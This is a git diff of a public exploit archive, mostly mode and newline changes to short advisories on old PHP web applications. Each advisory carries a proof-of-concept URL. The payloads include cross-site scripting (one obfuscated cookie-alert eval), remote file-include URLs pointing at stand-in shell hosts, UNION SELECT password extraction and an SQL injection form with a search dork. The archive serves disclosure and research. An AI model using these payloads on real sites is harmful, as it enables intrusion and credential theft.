b/platforms/php/webapps/29855.txt old mode 100755 new mode 100644 index e8e405647..16fbd6d21 --- a/platforms/php/webapps/29855.txt +++ b/platforms/php/webapps/29855.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow This issue affects FloweRS 2; other versions may also be vulnerable. -http://www.example.com/[path]/cas.php?rok=<script>alert(/the_Edit0r/);</script> \ No newline at end of file +http://www.example.com/[path]/cas.php?rok=<script>alert(/the_Edit0r/);</script> \ No newline at end of file diff --git a/platforms/php/webapps/29861.txt b/platforms/php/webapps/29861.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29863.txt b/platforms/php/webapps/29863.txt old mode 100755 new mode 100644 index e6e54f27e..2d298f9e9 --- a/platforms/php/webapps/29863.txt +++ b/platforms/php/webapps/29863.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an attacker to compromise the application and th This issue affects Actionpoll 1.1.0; other versions may also be vulnerable. -http://www.example.com/[script path]/actionpoll.php?CONFIG_POLLDB=http://evil_scripts? \ No newline at end of file +http://www.example.com/[script path]/actionpoll.php?CONFIG_POLLDB=http://evil_scripts? \ No newline at end of file diff --git a/platforms/php/webapps/29864.php b/platforms/php/webapps/29864.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29865.txt b/platforms/php/webapps/29865.txt old mode 100755 new mode 100644 index cff289e42..00a03c63c --- a/platforms/php/webapps/29865.txt +++ b/platforms/php/webapps/29865.txt @@ -7,4 +7,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Wabbit Gallery Script 0.9 is vulnerable to this issue; other versions may also be affected. http://www.example.com/[path]/showpic.php?pic=[xss] -http://www.example.com/[path]/showpic.php?gal=[xss] \ No newline at end of file +http://www.example.com/[path]/showpic.php?gal=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/29866.txt b/platforms/php/webapps/29866.txt old mode 100755 new mode 100644 index b2751c270..e1fb98818 --- a/platforms/php/webapps/29866.txt +++ b/platforms/php/webapps/29866.txt @@ -8,4 +8,4 @@ PHP-Nuke 8.0.0.3.3b is vulnerable to these issues; other versions may also be af http://www.example.com/nuke/?%2f* -http://www.example.com/html80/?%2f**/UNION%2f**/SELECT \ No newline at end of file +http://www.example.com/html80/?%2f**/UNION%2f**/SELECT \ No newline at end of file diff --git a/platforms/php/webapps/29868.txt b/platforms/php/webapps/29868.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29869.php b/platforms/php/webapps/29869.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29870.txt b/platforms/php/webapps/29870.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29871.txt b/platforms/php/webapps/29871.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29872.txt b/platforms/php/webapps/29872.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29874.txt b/platforms/php/webapps/29874.txt old mode 100755 new mode 100644 index 810bbef17..12438d896 --- a/platforms/php/webapps/29874.txt +++ b/platforms/php/webapps/29874.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an attacker to compromise the application and th This issue affects PHP Turbulence 0.0.1 alpha; other versions may also be affected. -http://www.example.com/user/turbulence.php?GLOBALS[tcore]=http://evil_host/evil_script.txt? \ No newline at end of file +http://www.example.com/user/turbulence.php?GLOBALS[tcore]=http://evil_host/evil_script.txt? \ No newline at end of file diff --git a/platforms/php/webapps/29876.txt b/platforms/php/webapps/29876.txt old mode 100755 new mode 100644 index 58bb60fed..c37b95163 --- a/platforms/php/webapps/29876.txt +++ b/platforms/php/webapps/29876.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br This issue affects TJSChat 0.95; other versions may also be affected. -http://www.example.com/you.php?user=[xss] \ No newline at end of file +http://www.example.com/you.php?user=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/29877.html b/platforms/php/webapps/29877.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29878.txt b/platforms/php/webapps/29878.txt old mode 100755 new mode 100644 index 8a07fcd2f..f52ea9cd8 --- a/platforms/php/webapps/29878.txt +++ b/platforms/php/webapps/29878.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an attacker to compromise the application and th Allfaclassifieds 6.04 is vulnerable; other versions may also be affected. -http://www.example.com/[path]/admin/setup/level2.php?dir=[EvilScript] \ No newline at end of file +http://www.example.com/[path]/admin/setup/level2.php?dir=[EvilScript] \ No newline at end of file diff --git a/platforms/php/webapps/29879.txt b/platforms/php/webapps/29879.txt old mode 100755 new mode 100644 index 358834ab0..99f69370f --- a/platforms/php/webapps/29879.txt +++ b/platforms/php/webapps/29879.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an attacker to compromise the application and th This issue affects PHPMyBibli 1.32; other versions may also be vulnerable. -http://www.example.com/includes/init.inc.php?base_path=Shell \ No newline at end of file +http://www.example.com/includes/init.inc.php?base_path=Shell \ No newline at end of file diff --git a/platforms/php/webapps/29880.txt b/platforms/php/webapps/29880.txt old mode 100755 new mode 100644 index e855479a8..1a9d7e25d --- a/platforms/php/webapps/29880.txt +++ b/platforms/php/webapps/29880.txt @@ -5,4 +5,4 @@ File117 is prone to multiple remote file-include vulnerabilities because it fail Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. http://www.example.com/html/php/detail.php?relPath=[shell]? -http://www.example.com/html/php/detail.php?folder=[shell]? \ No newline at end of file +http://www.example.com/html/php/detail.php?folder=[shell]? \ No newline at end of file diff --git a/platforms/php/webapps/29882.html b/platforms/php/webapps/29882.html old mode 100755 new mode 100644 index bb0aa6b5f..9ce44f5e3 --- a/platforms/php/webapps/29882.html +++ b/platforms/php/webapps/29882.html @@ -6,4 +6,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc phpMySpace Gold 8.10 is vulnerable; other versions may also be affected. -<html> <head><title>phpMySpace Gold (v8.10) - Blind SQL/XPath Injection Exploit</title><body> <center><br><br><font size=4>phpMySpace Gold (v8.10) - Blind SQL/XPath Injection Exploit</font><br><font size=3>discovered by <a href="http://john-martinelli.com">John Martinelli</a><br><br>Google d0rk: <a href="http://www.google.com/search?q=+%22Powered+by+phpMySpace+Gold+8.10%22">"Powered by Ripe Website Manager"</a></font><br> <br><br> <form action="http://www.example.com/path/modules/news/article.php" method="get"> <input name="mode" type="hidden" value="0"> <input name="order" type="hidden" value="0"> <input name="item_id" size=75 value="1" AND "1"="0"> <input type=submit value="Execute SQL Injection" class="button"> </form> </body></html> \ No newline at end of file +<html> <head><title>phpMySpace Gold (v8.10) - Blind SQL/XPath Injection Exploit</title><body> <center><br><br><font size=4>phpMySpace Gold (v8.10) - Blind SQL/XPath Injection Exploit</font><br><font size=3>discovered by <a href="http://john-martinelli.com">John Martinelli</a><br><br>Google d0rk: <a href="http://www.google.com/search?q=+%22Powered+by+phpMySpace+Gold+8.10%22">"Powered by Ripe Website Manager"</a></font><br> <br><br> <form action="http://www.example.com/path/modules/news/article.php" method="get"> <input name="mode" type="hidden" value="0"> <input name="order" type="hidden" value="0"> <input name="item_id" size=75 value="1" AND "1"="0"> <input type=submit value="Execute SQL Injection" class="button"> </form> </body></html> \ No newline at end of file diff --git a/platforms/php/webapps/29883.txt b/platforms/php/webapps/29883.txt old mode 100755 new mode 100644 index 03f57bdb1..48e412258 --- a/platforms/php/webapps/29883.txt +++ b/platforms/php/webapps/29883.txt @@ -4,4 +4,4 @@ acvsws_php5 is prone to a remote file-include vulnerability because it fails to Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible. -http://www.example.com/inc_ACVS/SOAP/Transport.php?CheminInclude=Shell \ No newline at end of file +http://www.example.com/inc_ACVS/SOAP/Transport.php?CheminInclude=Shell \ No newline at end of file diff --git a/platforms/php/webapps/29885.txt b/platforms/php/webapps/29885.txt old mode 100755 new mode 100644 index 241ea047b..5b009f64c --- a/platforms/php/webapps/29885.txt +++ b/platforms/php/webapps/29885.txt @@ -4,4 +4,4 @@ Claroline is prone to a remote file-include vulnerability because it fails to su Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible. -http://www.example.com//claroline/inc/lib/rootSys=Shell \ No newline at end of file +http://www.example.com//claroline/inc/lib/rootSys=Shell \ No newline at end of file diff --git a/platforms/php/webapps/29886.txt b/platforms/php/webapps/29886.txt old mode 100755 new mode 100644 index ea4a710b2..fe6e42b12 --- a/platforms/php/webapps/29886.txt +++ b/platforms/php/webapps/29886.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an attacker to compromise the application and th This issue affects LMS 1.5.3 and 1.5.4; earlier versions may also be vulnerable. -http://www.example.com/modules/rtmessageadd.php?_LIB_DIR=Shell? \ No newline at end of file +http://www.example.com/modules/rtmessageadd.php?_LIB_DIR=Shell? \ No newline at end of file diff --git a/platforms/php/webapps/29887.txt b/platforms/php/webapps/29887.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29888.txt b/platforms/php/webapps/29888.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29889.txt b/platforms/php/webapps/29889.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29890.txt b/platforms/php/webapps/29890.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29891.txt b/platforms/php/webapps/29891.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29892.html b/platforms/php/webapps/29892.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29893.txt b/platforms/php/webapps/29893.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29894.txt b/platforms/php/webapps/29894.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29895.txt b/platforms/php/webapps/29895.txt old mode 100755 new mode 100644 index c99f8fb6b..acc7e850b --- a/platforms/php/webapps/29895.txt +++ b/platforms/php/webapps/29895.txt @@ -7,4 +7,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Versions prior to phpMyAdmin 2.10.1 are vulnerable to this issue. http://www.example.com/[path]/showpic.php?pic=[xss] -http://www.example.com/[path]/showpic.php?gal=[xss] \ No newline at end of file +http://www.example.com/[path]/showpic.php?gal=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/29898.txt b/platforms/php/webapps/29898.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29899.txt b/platforms/php/webapps/29899.txt old mode 100755 new mode 100644 index 00df2cd7e..55836cbad --- a/platforms/php/webapps/29899.txt +++ b/platforms/php/webapps/29899.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an attacker to compromise the application and th This issue affects MyNewsGroups 0.6; other versions may also be vulnerable. -http://www.example.com/include.php?myng_root=http://shell \ No newline at end of file +http://www.example.com/include.php?myng_root=http://shell \ No newline at end of file diff --git a/platforms/php/webapps/29902.txt b/platforms/php/webapps/29902.txt old mode 100755 new mode 100644 index 3dd3b578e..60b5ee0eb --- a/platforms/php/webapps/29902.txt +++ b/platforms/php/webapps/29902.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an attacker to compromise the application and th This issue affects PHPMyTGP 1.4b; other versions may also be affected. -http://www.example.com/addvip.php?msetstr["PROGSDIR"]=http://shell \ No newline at end of file +http://www.example.com/addvip.php?msetstr["PROGSDIR"]=http://shell \ No newline at end of file diff --git a/platforms/php/webapps/29903.txt b/platforms/php/webapps/29903.txt old mode 100755 new mode 100644 index c6f3f196b..b0cb25765 --- a/platforms/php/webapps/29903.txt +++ b/platforms/php/webapps/29903.txt @@ -5,4 +5,4 @@ Ahhp Portal is prone to multiple remote file-include vulnerabilities because it Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. http://www.example.com/page.php?fp=r57shell? -http://www.example.com/page.php?sc=r57shell? \ No newline at end of file +http://www.example.com/page.php?sc=r57shell? \ No newline at end of file diff --git a/platforms/php/webapps/29904.txt b/platforms/php/webapps/29904.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29905.txt b/platforms/php/webapps/29905.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29906.txt b/platforms/php/webapps/29906.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29907.txt b/platforms/php/webapps/29907.txt old mode 100755 new mode 100644 index 4d1d2ba74..b6082360e --- a/platforms/php/webapps/29907.txt +++ b/platforms/php/webapps/29907.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an attacker to compromise the application and th This issue affects Comus 2.0; other versions may also be affected. -http://www.example.com/accept.php?DOCUMENT_ROOT=http://shell \ No newline at end of file +http://www.example.com/accept.php?DOCUMENT_ROOT=http://shell \ No newline at end of file diff --git a/platforms/php/webapps/29908.txt b/platforms/php/webapps/29908.txt old mode 100755 new mode 100644 index 17bf961d8..98657ef9c --- a/platforms/php/webapps/29908.txt +++ b/platforms/php/webapps/29908.txt @@ -6,4 +6,4 @@ Exploiting these issues may allow an attacker to compromise the application and These issues affect Sunshop 4; other versions may also be vulnerable. -http://www.example.com/include/payment/payflow_pro.php?abs_path=http://www.example2.com/? \ No newline at end of file +http://www.example.com/include/payment/payflow_pro.php?abs_path=http://www.example2.com/? \ No newline at end of file diff --git a/platforms/php/webapps/29909.txt b/platforms/php/webapps/29909.txt old mode 100755 new mode 100644 index ede45cc7b..5c91f0561 --- a/platforms/php/webapps/29909.txt +++ b/platforms/php/webapps/29909.txt @@ -4,4 +4,4 @@ HYIP Manager Pro is prone to multiple remote file-include vulnerabilities becaus Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible. -http://www.example.com/inc/libs/Smarty_Compiler.class.php?plugin_file=http://www,example2.com \ No newline at end of file +http://www.example.com/inc/libs/Smarty_Compiler.class.php?plugin_file=http://www,example2.com \ No newline at end of file diff --git a/platforms/php/webapps/29910.txt b/platforms/php/webapps/29910.txt old mode 100755 new mode 100644 index c598d7e45..0973a1e32 --- a/platforms/php/webapps/29910.txt +++ b/platforms/php/webapps/29910.txt @@ -6,4 +6,4 @@ An attacker can exploit this vulnerability to execute malicious PHP code in the htmlEditbox 2.2 is vulnerable to this issue; other versions may also be affected. -http://www.example.com/_editor.php?settings[app_dir]=http://shell \ No newline at end of file +http://www.example.com/_editor.php?settings[app_dir]=http://shell \ No newline at end of file diff --git a/platforms/php/webapps/29911.txt b/platforms/php/webapps/29911.txt old mode 100755 new mode 100644 index 3b405845e..f688847bb --- a/platforms/php/webapps/29911.txt +++ b/platforms/php/webapps/29911.txt @@ -6,4 +6,4 @@ Exploiting these issues may allow an attacker to compromise the application and DynaTracker 1.5.1 is reported vulnerable; other versions may also be affected. -http://www.example.com/DynaTracker_v151/includes_handler.php?base_path=http://shell \ No newline at end of file +http://www.example.com/DynaTracker_v151/includes_handler.php?base_path=http://shell \ No newline at end of file diff --git a/platforms/php/webapps/29912.txt b/platforms/php/webapps/29912.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29913.txt b/platforms/php/webapps/29913.txt old mode 100755 new mode 100644 index ca0ec2405..bb2c30394 --- a/platforms/php/webapps/29913.txt +++ b/platforms/php/webapps/29913.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an attacker to compromise the application and th Active PHP Bookmarks 1.0 is vulnerable; other versions may also be affected. -http://www.example.com/apb.php?APB_SETTINGS['apb_path']=http://shell/ \ No newline at end of file +http://www.example.com/apb.php?APB_SETTINGS['apb_path']=http://shell/ \ No newline at end of file diff --git a/platforms/php/webapps/29914.txt b/platforms/php/webapps/29914.txt old mode 100755 new mode 100644 index c3d683df5..4651b61a8 --- a/platforms/php/webapps/29914.txt +++ b/platforms/php/webapps/29914.txt @@ -5,4 +5,4 @@ Doruk100Net is prone to a remote file-include vulnerability because it fails to Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible. http://www.example.com/[path]/info.php?file=http://shell -http://victim/info.php?file=http://shell \ No newline at end of file +http://victim/info.php?file=http://shell \ No newline at end of file diff --git a/platforms/php/webapps/29915.txt b/platforms/php/webapps/29915.txt old mode 100755 new mode 100644 index 7631f1d4d..0e04592d5 --- a/platforms/php/webapps/29915.txt +++ b/platforms/php/webapps/29915.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow MoinMoin 1.5.7 is vulnerable; other versions may also be affected. -http://www.example.com/action=AttachFile&do=<script src=http://js_script></script> \ No newline at end of file +http://www.example.com/action=AttachFile&do=<script src=http://js_script></script> \ No newline at end of file diff --git a/platforms/php/webapps/29917.php b/platforms/php/webapps/29917.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29935.php b/platforms/php/webapps/29935.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29938.txt b/platforms/php/webapps/29938.txt old mode 100755 new mode 100644 index f89522ff2..953fcbb18 --- a/platforms/php/webapps/29938.txt +++ b/platforms/php/webapps/29938.txt @@ -4,4 +4,4 @@ E-Annu is prone to an SQL-injection vulnerability because it fails to sufficient Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation. -http://www.example.com/home.php?a='/**/UNION/**/SELECT/**/0,password,1,2,3,4,6/**/FROM/**/user/**/WHERE/**/user_id=1/* \ No newline at end of file +http://www.example.com/home.php?a='/**/UNION/**/SELECT/**/0,password,1,2,3,4,6/**/FROM/**/user/**/WHERE/**/user_id=1/* \ No newline at end of file diff --git a/platforms/php/webapps/29941.txt b/platforms/php/webapps/29941.txt old mode 100755 new mode 100644 index 8c03097e1..3a04e18c7 --- a/platforms/php/webapps/29941.txt +++ b/platforms/php/webapps/29941.txt @@ -8,4 +8,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc CMS Made Simple 1.05 is vulnerable to this issue; other versions may also be affected. http://www.example.com/stylesheet.php?templateid=16+AND+1=1 -http://www.example.com/stylesheet.php?templateid=16+AND+1=0 \ No newline at end of file +http://www.example.com/stylesheet.php?templateid=16+AND+1=0 \ No newline at end of file diff --git a/platforms/php/webapps/29946.txt b/platforms/php/webapps/29946.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29953.txt b/platforms/php/webapps/29953.txt old mode 100755 new mode 100644 index 028b07e0e..aa68db4db --- a/platforms/php/webapps/29953.txt +++ b/platforms/php/webapps/29953.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an attacker to compromise the application and th PHP Content Architect 0.9 pre 1.2 is vulnerable; other versions may also be affected. -http://www.example.com/[path]noah/modules/noevents/templates/mfa_theme.php?tpls[1]=[shell] \ No newline at end of file +http://www.example.com/[path]noah/modules/noevents/templates/mfa_theme.php?tpls[1]=[shell] \ No newline at end of file diff --git a/platforms/php/webapps/29955.txt b/platforms/php/webapps/29955.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29956.txt b/platforms/php/webapps/29956.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29957.txt b/platforms/php/webapps/29957.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29960.txt b/platforms/php/webapps/29960.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29961.txt b/platforms/php/webapps/29961.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29963.txt b/platforms/php/webapps/29963.txt old mode 100755 new mode 100644 index ff03a6d77..913f7fb4b --- a/platforms/php/webapps/29963.txt +++ b/platforms/php/webapps/29963.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow Kayako eSupport 3.00.90 is vulnerable to this issue; other versions may also be affected. -http://example.com/index.php?_m="><script>alert(1);</script> \ No newline at end of file +http://example.com/index.php?_m="><script>alert(1);</script> \ No newline at end of file diff --git a/platforms/php/webapps/29965.txt b/platforms/php/webapps/29965.txt old mode 100755 new mode 100644 index d2431f9f0..39d5048d5 --- a/platforms/php/webapps/29965.txt +++ b/platforms/php/webapps/29965.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow This issue affects Advanced Guestbook 2.4.2; other versions may also be affected. -http://www.example.com/picture.php?size[0]=1&size[1]=1&img=1&picture=[xss] \ No newline at end of file +http://www.example.com/picture.php?size[0]=1&size[1]=1&img=1&picture=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/29966.txt b/platforms/php/webapps/29966.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29967.txt b/platforms/php/webapps/29967.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29968.txt b/platforms/php/webapps/29968.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29969.txt b/platforms/php/webapps/29969.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29970.txt b/platforms/php/webapps/29970.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29971.txt b/platforms/php/webapps/29971.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29972.txt b/platforms/php/webapps/29972.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29973.txt b/platforms/php/webapps/29973.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29974.txt b/platforms/php/webapps/29974.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29975.txt b/platforms/php/webapps/29975.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29976.txt b/platforms/php/webapps/29976.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29977.txt b/platforms/php/webapps/29977.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29978.txt b/platforms/php/webapps/29978.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29979.txt b/platforms/php/webapps/29979.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29980.txt b/platforms/php/webapps/29980.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29981.txt b/platforms/php/webapps/29981.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29982.txt b/platforms/php/webapps/29982.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29983.txt b/platforms/php/webapps/29983.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29984.txt b/platforms/php/webapps/29984.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29985.txt b/platforms/php/webapps/29985.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29986.txt b/platforms/php/webapps/29986.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29987.txt b/platforms/php/webapps/29987.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29988.txt b/platforms/php/webapps/29988.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29989.txt b/platforms/php/webapps/29989.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29990.txt b/platforms/php/webapps/29990.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29991.txt b/platforms/php/webapps/29991.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29992.txt b/platforms/php/webapps/29992.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29993.txt b/platforms/php/webapps/29993.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29994.txt b/platforms/php/webapps/29994.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29995.txt b/platforms/php/webapps/29995.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29996.txt b/platforms/php/webapps/29996.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29997.txt b/platforms/php/webapps/29997.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/29998.txt b/platforms/php/webapps/29998.txt old mode 100755 new mode 100644 index 80bba316e..a302fb5d2 --- a/platforms/php/webapps/29998.txt +++ b/platforms/php/webapps/29998.txt @@ -6,5 +6,4 @@ Exploiting this issue allows remote attackers to execute code in the context of This issue affects Campsite 2.6.1. Earlier versions may also be affected. -http://www.example.com/classes/User.php?g_DocumentRoot=shell.txt? - \ No newline at end of file +http://www.example.com/classes/User.php?g_DocumentRoot=shell.txt? \ No newline at end of file diff --git a/platforms/php/webapps/29999.txt b/platforms/php/webapps/29999.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30002.txt b/platforms/php/webapps/30002.txt old mode 100755 new mode 100644 index 07ac2364f..dffcbc105 --- a/platforms/php/webapps/30002.txt +++ b/platforms/php/webapps/30002.txt @@ -27,4 +27,4 @@ Milad Hacking We Love Mohammad -############## \ No newline at end of file +############## \ No newline at end of file diff --git a/platforms/php/webapps/30003.txt b/platforms/php/webapps/30003.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30004.txt b/platforms/php/webapps/30004.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30005.txt b/platforms/php/webapps/30005.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30006.txt b/platforms/php/webapps/30006.txt old mode 100755 new mode 100644 index 90a2f1a58..90034fcd4 --- a/platforms/php/webapps/30006.txt +++ b/platforms/php/webapps/30006.txt @@ -6,4 +6,4 @@ Exploiting this issue allows remote attackers to execute code in the context of This issue affects Campsite 2.6.1. Earlier versions may also be affected. -http://www.example.com/priv/localizer/LocalizerLanguage.php?g_DocumentRoot=shell.txt? \ No newline at end of file +http://www.example.com/priv/localizer/LocalizerLanguage.php?g_DocumentRoot=shell.txt? \ No newline at end of file diff --git a/platforms/php/webapps/30012.txt b/platforms/php/webapps/30012.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30013.txt b/platforms/php/webapps/30013.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30015.txt b/platforms/php/webapps/30015.txt old mode 100755 new mode 100644 index 80d248875..eff46c57d --- a/platforms/php/webapps/30015.txt +++ b/platforms/php/webapps/30015.txt @@ -6,4 +6,4 @@ Exploiting this issue may allow an unauthorized user to view files and execute l Advanced Guestbook 2.4.2 is vulnerable to this issue; other versions may also be affected. -http://www.example.com/../../../hack_www/htdocs/hack \ No newline at end of file +http://www.example.com/../../../hack_www/htdocs/hack \ No newline at end of file diff --git a/platforms/php/webapps/3002.php b/platforms/php/webapps/3002.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30022.txt b/platforms/php/webapps/30022.txt old mode 100755 new mode 100644 index 301cee2d2..2c5ead203 --- a/platforms/php/webapps/30022.txt +++ b/platforms/php/webapps/30022.txt @@ -4,4 +4,4 @@ PHP Multi User Randomizer is prone to a cross-site scripting vulnerability becau An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://www.example.com/web/configure_plugin.tpl.php?edit_plugin==[xss] \ No newline at end of file +http://www.example.com/web/configure_plugin.tpl.php?edit_plugin==[xss] \ No newline at end of file diff --git a/platforms/php/webapps/30027.txt b/platforms/php/webapps/30027.txt old mode 100755 new mode 100644 index e30ca1bfb..1d523b45f --- a/platforms/php/webapps/30027.txt +++ b/platforms/php/webapps/30027.txt @@ -8,4 +8,4 @@ CommuniGate Pro 5.1.8 and earlier versions are vulnerable to this issue. Note that this issue is present only when using Microsoft Internet Explorer. -<STYLE>@im\port'\ja\vasc\ript:alert("XSS in message body (style using import)")';</STYLE> \ No newline at end of file +<STYLE>@im\port'\ja\vasc\ript:alert("XSS in message body (style using import)")';</STYLE> \ No newline at end of file diff --git a/platforms/php/webapps/30028.txt b/platforms/php/webapps/30028.txt old mode 100755 new mode 100644 index c80607329..650055539 --- a/platforms/php/webapps/30028.txt +++ b/platforms/php/webapps/30028.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow EQDKP 1.3.2c and prior versions are affected. -http://www.example.com/path-to-eqdkp/listmembers.php?show=%22%3E%3Cplaintext%3E \ No newline at end of file +http://www.example.com/path-to-eqdkp/listmembers.php?show=%22%3E%3Cplaintext%3E \ No newline at end of file diff --git a/platforms/php/webapps/30029.txt b/platforms/php/webapps/30029.txt old mode 100755 new mode 100644 index ccec2dfd3..534e4ab49 --- a/platforms/php/webapps/30029.txt +++ b/platforms/php/webapps/30029.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow This issue affects SonicBB 1.0; other versions may also be affected. -http://www.example.com/search.php?query=1&part=[xss] \ No newline at end of file +http://www.example.com/search.php?query=1&part=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/3003.txt b/platforms/php/webapps/3003.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/30035.txt b/platforms/php/webapps/30035.txt old mode 100755 new mode 100644 index e253e5c5c..32b844707 --- a/platforms/php/webapps/30035.txt +++ b/platforms/php/webapps/30035.txt @@ -8,4 +8,4 @@ SonicBB 1.0 is vulnerable; other versions may also be affected. http://www.example.com/path/search.php?query=1&part=post`<> '' UNIoN SELECT `id`,`password`,1,1,1,1,`username` FROM `users` WHERE id=1/*&by=*/ -http://www.example.com/path/viewforum.php?id=1' UNION SELECT `id`,`password`,1,1,1,1,1 FROM `users` WHERE id=1%23 \ No newline at end of file +http://www.example.com/path/viewforum.php?id=1' UNION SELECT `id`,`password`,1,1,1,1,1 FROM `users` WHERE id=1%23 \ No newline at end of file diff --git a/platforms/php/webapps/30036.html b/platforms/php/webapps/30036.html old mode 100755 new mode 100644 index f5b53d90e..f40179086 --- a/platforms/php/webapps/30036.html +++ b/platforms/php/webapps/30036.html @@ -4,4 +4,4 @@ The WordPress Akismet plugin is prone to an unspecified vulnerability. Few technical details are currently available. We will update this BID as more information emerges. -<html> <body> <form action="http://www.example.com/wp-admin/plugins.php?page=akismet-key-config" method="post" id="akismet-conf"> <input name="_wpnonce" value="'" type="text"> <input name="_wp_http_referer" value="'%2522><script>eval(String.fromCharCode(97,108,101,114,116,40,100,111,99,117,109,101,110,116,46,99,111,111,107,105 ,101,41))</script>" type="text"> <input id="key" name="key" size="15" maxlength="12" value="1337"> <input name="submit" value="Update options »" 